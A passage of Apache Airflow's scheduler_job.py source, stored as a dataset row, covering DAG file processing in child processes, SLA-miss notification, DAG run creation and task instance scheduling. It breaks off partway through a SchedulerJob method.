source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
scheduler_job.py | # pylint: disable=no-name-in-module
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import ExitStack, redirect_stderr, redirect_stdout, suppress
from datetime import timedelta
from itertools import groupby
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import Any, DefaultDict, Dict, List, Optional, Set, Tuple
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm import load_only
from sqlalchemy.orm.session import Session, make_transient
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.executors.executor_loader import UNPICKLEABLE_EXECUTORS
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagModel, SlaMiss, errors
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.taskinstance import SimpleTaskInstance, TaskInstanceKey
from airflow.operators.dummy_operator import DummyOperator
from airflow.serialization.serialized_objects import SerializedDAG
from airflow.stats import Stats
from airflow.ti_deps.dep_context import DepContext
from airflow.ti_deps.dependencies_deps import SCHEDULED_DEPS
from airflow.ti_deps.dependencies_states import EXECUTION_STATES
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (
AbstractDagFileProcessorProcess, DagFileProcessorAgent, FailureCallbackRequest, SimpleDagBag,
)
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.session import provide_session
from airflow.utils.sqlalchemy import skip_locked
from airflow.utils.state import State
from airflow.utils.types import DagRunType
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin, MultiprocessingStartMethodMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param failure_callback_requests: failure callback to execute
:type failure_callback_requests: List[airflow.utils.dag_processing.FailureCallbackRequest]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(
self,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
failure_callback_requests: List[FailureCallbackRequest]
):
super().__init__()
self._file_path = file_path
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._failure_callback_requests = failure_callback_requests
# The process that was launched to process the given .
self._process: Optional[multiprocessing.process.BaseProcess] = None
# The result of Scheduler.process_file(file_path).
self._result: Optional[Tuple[List[dict], int]] = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time: Optional[datetime.datetime] = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
self._parent_channel: Optional[MultiprocessingConnection] = None
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self) -> str:
return self._file_path
@staticmethod
def _run_file_processor(
result_channel: MultiprocessingConnection,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
thread_name: str,
failure_callback_requests: List[FailureCallbackRequest]
) -> None:
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_ids: if specified, only examine DAG ID's that are
in this list
:type dag_ids: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param failure_callback_requests: failure callback to execute
:type failure_callback_requests: list[airflow.utils.dag_processing.FailureCallbackRequest]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log: logging.Logger = logging.getLogger("airflow.processor")
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
with ExitStack() as exit_stack:
exit_stack.enter_context(redirect_stdout(StreamLogWriter(log, logging.INFO))) # type: ignore
exit_stack.enter_context(redirect_stderr(StreamLogWriter(log, logging.WARN))) # type: ignore
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_ids, log=log)
result: Tuple[List[dict], int] = dag_file_processor.process_file(
file_path=file_path,
pickle_dags=pickle_dags,
failure_callback_requests=failure_callback_requests,
)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception: # pylint: disable=broad-except
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self) -> None:
"""
Launch the process and start processing the DAG.
"""
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
self._parent_channel, _child_channel = context.Pipe()
process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_ids,
"DagFileProcessor{}".format(self._instance_id),
self._failure_callback_requests
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._process = process
self._start_time = timezone.utcnow()
process.start()
def kill(self) -> None:
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
self._kill_process()
def terminate(self, sigkill: bool = False) -> None:
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
with suppress(TimeoutError):
self._process._popen.wait(5) # type: ignore # pylint: disable=protected-access
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self) -> None:
if self._process is None:
raise AirflowException("Tried to kill process before starting!")
if self._process.is_alive() and self._process.pid:
self.log.warning("Killing DAGFileProcessorProcess (PID=%d)", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self) -> int:
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None or self._process.pid is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self) -> Optional[int]:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get exit code before starting!")
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None or self._parent_channel is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self) -> Optional[Tuple[List[dict], int]]:
"""
:return: result of running SchedulerJob.process_file()
:rtype: Optional[Tuple[List[dict], int]]
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self) -> datetime.datetime:
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
@property
def waitable_handle(self):
return self._process.sentinel
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param log: Logger to save the processing process
:type log: logging.Logger
"""
UNIT_TEST_MODE: bool = conf.getboolean('core', 'UNIT_TEST_MODE')
def __init__(self, dag_ids: Optional[List[str]], log: logging.Logger):
super().__init__()
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag: DAG, session: Session = None) -> None:
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any(isinstance(ti.sla, timedelta) for ti in dag.tasks):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
qry = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti')
)
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(
or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED
)
)
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis: List[TI] = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == qry.c.task_id,
TI.execution_date == qry.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
if not isinstance(task.sla, timedelta):
continue
dttm = dag.following_schedule(ti.execution_date)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas: List[SlaMiss] = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas: # pylint: disable=too-many-nested-blocks
sla_dates: List[datetime.datetime] = [sla.execution_date for sla in slas]
fetched_tis: List[TI] = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis: List[TI] = []
for ti in fetched_tis:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception: # pylint: disable=broad-except
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}\n{bug}<code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.",
sla.task_id)
continue
tasks_missed_sla.append(task)
emails: Set[str] = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception: # pylint: disable=broad-except
Stats.incr('sla_email_notification_failure')
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session: Session, dagbag: DagBag) -> None:
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(errors.ImportError(
filename=filename,
timestamp=timezone.utcnow(),
stacktrace=stacktrace))
session.commit()
# pylint: disable=too-many-return-statements,too-many-branches
@provide_session
def create_dag_run(
self,
dag: DAG,
dag_runs: Optional[List[DagRun]] = None,
session: Session = None,
) -> Optional[DagRun]:
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
# pylint: disable=too-many-nested-blocks
if not dag.schedule_interval:
return None
active_runs: List[DagRun]
if dag_runs is None:
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
else:
active_runs = [
dag_run
for dag_run in dag_runs
if not dag_run.external_trigger
]
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return None
timed_out_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout
):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timed_out_runs += 1
session.commit()
if len(active_runs) - timed_out_runs >= dag.max_active_runs:
return None
# this query should be replaced by find dagrun
last_scheduled_run: Optional[datetime.datetime] = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
DagRun.run_type == DagRunType.SCHEDULED.value
)).scalar()
)
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
# don't do scheduler catchup for dag's that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now or isinstance(dag.schedule_interval, timedelta):
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return None
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
period_end = None
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return None
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = min([t.end_date for t in dag.tasks if t.end_date], default=None)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return None
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_type=DagRunType.SCHEDULED,
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
return None
@provide_session
def _process_task_instances(
self, dag: DAG, dag_runs: List[DagRun], session: Session = None
) -> List[TaskInstanceKey]:
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
active_dag_runs = 0
task_instances_list = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future unless
# specified by config and schedule_interval is None
if run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if active_dag_runs >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag # type: ignore
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
ready_tis = run.update_state(session=session)
if run.state == State.RUNNING:
active_dag_runs += 1
self.log.debug("Examining active DAG run: %s", run)
for ti in ready_tis:
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
return task_instances_list
@provide_session
def _process_dags(self, dags: List[DAG], session: Session = None) -> List[TaskInstanceKey]:
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs (if CHECK_SLAS config enabled).
:param dags: the DAGs from the DagBag to process
:type dags: List[airflow.models.DAG]
:rtype: list[TaskInstance]
:return: A list of generated TaskInstance objects
"""
check_slas: bool = conf.getboolean('core', 'CHECK_SLAS', fallback=True)
use_job_schedule: bool = conf.getboolean('scheduler', 'USE_JOB_SCHEDULE')
# pylint: disable=too-many-nested-blocks
tis_out: List[TaskInstanceKey] = []
dag_ids: List[str] = [dag.dag_id for dag in dags]
dag_runs = DagRun.find(dag_id=dag_ids, state=State.RUNNING, session=session)
# As per the docs of groupby (https://docs.python.org/3/library/itertools.html#itertools.groupby)
# we need to use `list()` otherwise the result will be wrong/incomplete
dag_runs_by_dag_id: Dict[str, List[DagRun]] = {
k: list(v) for k, v in groupby(dag_runs, lambda d: d.dag_id)
}
for dag in dags:
dag_id: str = dag.dag_id
self.log.info("Processing %s", dag_id)
dag_runs_for_dag = dag_runs_by_dag_id.get(dag_id) or []
# Only creates DagRun for DAGs that are not subdag since
# DagRun of subdags are created when SubDagOperator executes.
if not dag.is_subdag and use_job_schedule:
dag_run = self.create_dag_run(dag, dag_runs=dag_runs_for_dag)
if dag_run:
dag_runs_for_dag.append(dag_run)
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
if dag_runs_for_dag:
tis_out.extend(self._process_task_instances(dag, dag_runs_for_dag))
if check_slas:
self.manage_slas(dag)
return tis_out
def _find_dags_to_process(self, dags: List[DAG]) -> List[DAG]:
"""
Find the DAGs that are not paused to process.
:param dags: specified DAGs
:return: DAGs to process
"""
if self.dag_ids:
dags = [dag for dag in dags
if dag.dag_id in self.dag_ids]
return dags
@provide_session
def execute_on_failure_callbacks(
self,
dagbag: DagBag,
failure_callback_requests: List[FailureCallbackRequest],
session: Session = None
) -> None:
"""
Execute on failure callbacks. These objects can come from SchedulerJob or from
DagFileProcessorManager.
:param failure_callback_requests: failure callbacks to execute
:type failure_callback_requests: List[airflow.utils.dag_processing.FailureCallbackRequest]
:param session: DB session.
"""
for request in failure_callback_requests:
simple_ti = request.simple_task_instance
if simple_ti.dag_id in dagbag.dags:
dag = dagbag.dags[simple_ti.dag_id]
if simple_ti.task_id in dag.task_ids:
task = dag.get_task(simple_ti.task_id)
ti = TI(task, simple_ti.execution_date)
# Get properties needed for failure handling from SimpleTaskInstance.
ti.start_date = simple_ti.start_date
ti.end_date = simple_ti.end_date
ti.try_number = simple_ti.try_number
ti.state = simple_ti.state
ti.test_mode = self.UNIT_TEST_MODE
ti.handle_failure(request.msg, ti.test_mode, ti.get_template_context())
self.log.info('Executed failure callback for %s in state %s', ti, ti.state)
session.commit()
@provide_session
def process_file(
self,
file_path: str,
failure_callback_requests: List[FailureCallbackRequest],
pickle_dags: bool = False,
session: Session = None
) -> Tuple[List[dict], int]:
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of serialized_dag dicts that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param failure_callback_requests: failure callback to execute
:type failure_callback_requests: List[airflow.utils.dag_processing.FailureCallbackRequest]
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:param session: Sqlalchemy ORM Session
:type session: Session
:return: a tuple with list of SimpleDags made from the Dags found in the file and
count of import errors.
:rtype: Tuple[List[dict], int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
try:
dagbag = DagBag(file_path, include_examples=False, include_smart_sensor=False)
except Exception: # pylint: disable=broad-except
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], 0
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
try:
self.execute_on_failure_callbacks(dagbag, failure_callback_requests)
except Exception: # pylint: disable=broad-except
self.log.exception("Error executing failure callback!")
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
dagbag.sync_to_db()
paused_dag_ids = DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
unpaused_dags: List[DAG] = [
dag for dag_id, dag in dagbag.dags.items() if dag_id not in paused_dag_ids
]
serialized_dags = self._prepare_serialized_dags(unpaused_dags, pickle_dags, session)
dags = self._find_dags_to_process(unpaused_dags)
ti_keys_to_schedule = self._process_dags(dags, session)
self._schedule_task_instances(dagbag, ti_keys_to_schedule, session)
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception: # pylint: disable=broad-except
self.log.exception("Error logging import errors!")
return serialized_dags, len(dagbag.import_errors)
@provide_session
def _schedule_task_instances(
self,
dagbag: DagBag,
ti_keys_to_schedule: List[TaskInstanceKey],
session: Session = None
) -> None:
"""
Checks whether the tasks specified by `ti_keys_to_schedule` parameter can be scheduled and
updates the information in the database,
:param dagbag: DagBag
:type dagbag: DagBag
:param ti_keys_to_schedule: List of task instance keys which can be scheduled.
:type ti_keys_to_schedule: list
"""
# Refresh all task instances that will be scheduled
filter_for_tis = TI.filter_for_tis(ti_keys_to_schedule)
refreshed_tis: List[TI] = []
if filter_for_tis is not None:
refreshed_tis = session.query(TI).filter(filter_for_tis).with_for_update().all()
for ti in refreshed_tis:
# Add task to task instance
dag: DAG = dagbag.dags[ti.dag_id]
ti.task = dag.get_task(ti.task_id)
# We check only deps needed to set TI to SCHEDULED state here.
# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True
):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# If the task is dummy, then mark it as done automatically
if isinstance(ti.task, DummyOperator) \
and not ti.task.on_execute_callback \
and not ti.task.on_success_callback:
ti.state = State.SUCCESS
ti.start_date = ti.end_date = timezone.utcnow()
ti.duration = 0
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
@provide_session
def _prepare_serialized_dags(
self, dags: List[DAG], pickle_dags: bool, session: Session = None
) -> List[dict]:
"""
Convert DAGS to SimpleDags. If necessary, it also Pickle the DAGs
:param dags: List of DAGs
:return: List of SimpleDag
:rtype: List[dict]
"""
serialized_dags: List[dict] = []
# Pickle the DAGs (if necessary) and put them into a SimpleDagBag
for dag in dags:
if pickle_dags:
dag.pickle(session)
serialized_dags.append(SerializedDAG.to_dict(dag))
return serialized_dags
class SchedulerJob(BaseJob): # pylint: disable=too-many-instance-attributes
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: str
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: str
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate: int = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id: Optional[str] = None,
dag_ids: Optional[List[str]] = None,
subdir: str = settings.DAGS_FOLDER,
num_runs: int = conf.getint('scheduler', 'num_runs'),
processor_poll_interval: float = conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle: bool = False,
log: Any = None,
*args, **kwargs):
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
if log:
self._log = log
# Check what SQL backend we use
sql_conn: str = conf.get('core', 'sql_alchemy_conn').lower()
self.using_sqlite = sql_conn.startswith('sqlite')
self.using_mysql = sql_conn.startswith('mysql')
self.max_tis_per_query: int = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent: Optional[DagFileProcessorAgent] = None
def register_exit_signals(self) -> None:
"""
Register signals that stop child processes
"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
@provide_session
def _change_state_for_tis_without_dagrun(
self,
simple_dag_bag: SimpleDagBag,
old_states: List[str],
new_state: str,
session: Session = None
) -> None:
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns are
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_states will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
.filter(models.TaskInstance.state.in_(old_states)) \
.filter(or_(
# pylint: disable=comparison-with-callable
models.DagRun.state != State.RUNNING,
models.DagRun.state.is_(None))) # pylint: disable=no-member
# We need to do this for mysql as well because it can cause deadlocks
# as discussed in https://issues.apache.org/jira/browse/AIRFLOW-2516
if self.using_sqlite or self.using_mysql:
tis_to_change: List[TI] = query.with_for_update().all()
